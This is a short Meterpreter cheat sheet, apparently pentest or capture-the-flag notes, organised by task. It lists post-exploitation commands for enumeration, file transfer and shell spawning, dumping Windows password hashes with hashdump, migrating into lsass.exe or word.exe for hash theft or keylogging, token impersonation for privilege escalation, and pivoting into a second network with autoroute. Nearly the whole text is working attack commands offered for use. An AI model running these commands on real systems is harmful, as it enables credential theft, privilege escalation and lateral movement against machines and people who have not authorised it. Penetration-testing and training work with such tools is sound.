https://github.com/rapid7/meterpreter
METERPRETER Enumeration
sysinfoInfo about the system.
getuidGet current user.
getenvGet one or more environment variable values.
search -f flag.txtSearch a file on the machine.
METERPRETER File Upload
uploadUpload a file or directory.
downloadDownload a file or directory.
METERPRETER Spawn Shell
shellSpawn a shell.
load powershellpowershell_shellSpawn Powershell.
METERPRETER Attacks
hashdumpDump hashes from Windows SAM base (for linux use module linux/gather/hashdump).
migrate 716 Migrate to another process. Ex : Migrate to a word.exe and act like a keylogger. Ex: Migrate to lsass.exe to run hashdump.
METERPRETER Impersonate
When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user.
load incognitolist_tokens -gList tokens.
impersonate_token "BUILTIN\Administrators"Impersonate token.
To determine rights, Windows uses the Primary Token of the process and not the impersonated token. So we have to migrate to a process with correct permissions.
The safest to pick is services.exe.
migrate 668Migrate to process 668.
METERPRETER Pivoting
When we have a meterpreter shell on a machine that has access to another network, we can use it to gain access to the 2nd network.
run autoroute -s [REMOTE_NETWORK]/24Create a route via the host that we had access to.
run autoroute -pShow added routes.